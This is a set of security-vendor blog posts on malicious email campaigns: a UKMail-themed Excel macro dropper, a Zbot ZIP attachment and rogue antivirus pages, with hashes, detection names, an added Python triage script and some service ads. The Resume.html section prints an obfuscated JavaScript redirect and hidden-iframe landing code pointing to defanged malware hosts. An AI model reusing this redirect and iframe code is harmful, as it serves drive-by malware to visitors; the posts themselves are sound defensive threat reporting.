New Excel malware: UKMail 988271023 tracking information from no-reply@ukmail.com


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “UKMail 988271023 tracking information”.

This email is sent from the spoofed address “no-reply@ukmail.com” and has the following body:

UKMail Info!
Your parcel has not been delivered to your address November 23, 2015, because nobody was at home.
Please view the information about your parcel, print it and go to the post office to receive your package.

Warranties
UKMail expressly disclaims all conditions, guarantees and warranties, express or implied, in respect of the Service.
Where the law prevents such exclusion and implies conditions and warranties into this contract,
where legally permissible the liability of UKMail for breach of such condition,
guarantee or warranty is limited at the option of UKMail to either supplying the Service again or paying the cost of having the service supplied again.
If you don’t receive a package within 30 working days UKMail will charge you for it’s keeping.
You can find any information about the procedure and conditions of parcel keeping in the nearest post office.

Best regards,
UKMail

The attached file 988271023-PRCL.xls is a 118 kB Excel file with an embedded malicious macro script that downloads a trojan from a remote host.

The malware is known as LooksLike.Macro.Malware.gen!x3 (v) or X97M.Dropper.KV.

At the time of writing, 3 of the 55 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: 6154fd92261dd65f02dad954db7ee9950251a0c4b3a8a2f40cc9c1b714927692

MX Lab Black Friday Promotion: special price per user and 60 days extra


MX Lab Black Friday Promotion!

Make use of our special MX Lab Black Friday promotion and benefit from a low price per user and 60 extra days of free email security services added to your 12 month subscription, which includes:

  • Zero hour anti virus to protect against the latest viruses and threats
  • Managed anti spam to get rid of the unwanted emails
  • Email archiving with a 60 day retention policy as standard

More information can be obtained on our web site or contact us directly with your questions.

Request your free trial today!

Email “Your document” contains trojan Trojan-Spy.Zbot


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Your document”, sent from spoofed addresses and with the following very short body:

To view your document, please open attachment.

The attached ZIP file has the name document_8608003.pdf.zip and contains the 196 kB large file c3.exe.

The trojan is known as Trojan-Spy.Zbot, W32/Risk.QSAW-8224, Luhe.Fiha.A or PE:Malware.FakePDF@CV!1.9C3A.

At the time of writing, 5 of the 54 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: b7e768d540e63e06139dc2dd194dda47b3a2712cb27b1d173127a7801ac88e88

Resume emails with attached file Resume.html lead to rogue AV software


MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE="Javascript"><!--
//
function xhtmldecode(x){
// writes the decoded string straight into the page, so whatever it contains is rendered
document.write(unescape(x))
}
function runit(){
// one percent-encoded string literal in the sample; split with "+" here only for readability
// decodes to: <meta http-equiv="refresh" content="0;url=hxxp://wimbert.nl/x.html">
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%" +
"72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B" +
"%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%" +
"6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//-->
</script>

When opening the attached HTML file you are directed to a web site with the following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>
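As an added example (my own code, not from the original post or MX Lab), a small Python triage helper that statically decodes the unescape() payload from the Resume.html attachment above and pulls the meta-refresh target and hidden iframe out of the landing page just shown; the same check applies to the near-identical landing page in the antivirus_24.exe post below. The two samples are constructed from the fragments quoted in the post, the URLs stay defanged with "hxxp" as the post prints them, and the regular expressions are an assumption of mine rather than a full HTML parser.

```python
import re
from urllib.parse import unquote

# Constructed samples, built from the two fragments quoted in the post
# (URLs kept defanged with "hxxp" exactly as the post prints them).
RESUME_HTML = (
    '<SCRIPT LANGUAGE="Javascript"><!--\n'
    'function xhtmldecode(x){document.write(unescape(x))}\n'
    'function runit(){x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%'
    '72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B'
    '%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%'
    '6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"\n'
    'xhtmldecode(x)}runit()//--></script>'
)
LANDING_HTML = (
    'PLEASE WAITING 4 SECOND...\n'
    '  <meta http-equiv="refresh" content="4;\n'
    'url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">\n'
    '</head><body>\n'
    '<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"\n'
    'style="visibility: hidden;" height="1" width="1"></iframe>\n'
    '</body></html>'
)

ESCAPED_RUN = re.compile(r'(?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2})+')
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*"refresh"[^>]*content\s*=\s*"(\d+)\s*;\s*url=([^"]+)"',
    re.I)
IFRAME = re.compile(r'<iframe[^>]*src\s*=\s*"([^"]+)"[^>]*>', re.I)
HIDDEN = re.compile(r'visibility:\s*hidden|height="1"|width="1"', re.I)

def js_unescape(s):
    """Approximate JavaScript unescape(): %uXXXX first, then %XX as single bytes."""
    s = re.sub(r'%u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')

def triage(html):
    """Report meta-refresh targets (with delay) and hidden iframes, both in the raw
    markup and in every percent-encoded run that unescape() would write into the DOM."""
    layers = [html] + [js_unescape(m.group(0)) for m in ESCAPED_RUN.finditer(html)]
    found = {"refresh": [], "hidden_iframe": []}
    for layer in layers:
        for delay, url in META_REFRESH.findall(layer):
            found["refresh"].append((int(delay), url.strip()))
        for m in IFRAME.finditer(layer):
            if HIDDEN.search(m.group(0)):
                found["hidden_iframe"].append(m.group(1))
    return found
```

Because the decoding is done statically, the attachment never has to be opened in a browser to learn where it sends the victim.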

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while, so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogue anti virus software antivirus_24.exe, as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Malicious emails lead to rogue AV software antivirus_24.exe


MX Lab intercepted emails that lead to the rogue anti virus software with the executable antivirus_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

We got the screen shown below, but I’m sure that on Windows it will look slightly different: some Windows icons for your hard drives and so on will be included.

You will be shown a series of errors claiming that your system is infected, and the instructions lead you to download the malware. This part is obviously fake, so please do not continue the process.

Virus Total permalink and MD5: 5be4b708a68687cb5490fe2caea49c82

MX Lab Summer Sales, only €8 per mailbox per year!


MX Lab is offering the Zero Hour Anti Virus and Managed Anti Spam for your mail server for € 8 per mailbox per year. For more information visit http://www.mxlab.eu/ and contact us.

Rogue online anti virus scanner Antivirus Plus


Antivirus Plus is a rogue anti virus scanner. When visiting a URL like hxxp://myreallyty.com/su/in.cgi?18 – something I don’t recommend doing at home – an online virus scanner starts to check your computer system. It won’t take long before the first viruses, malware and trojans are “detected”.

The online virus scanner gives you the warning that you have several infections: I-Worm.Sobig, TrojanDropper.JS.Mimail and Backdoor.SdBot.gen being one of the most critical infections according to Antivirus Plus.


Antivirus Plus will soon give you the warning that it can’t clean your computer and offer you the option to download additional software to do so.

The file Installer_70137.exe is downloaded and is known as:

Win32:Trojan-gen (Avast)
Trojan.Win32.Agent2.gnf (F-Prot, Kaspersky)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Troj/FakeAV-NT (Sophos)

Virus Total permalink and MD5: 916e0f7aef7f1ea6308fa886d41ed750.
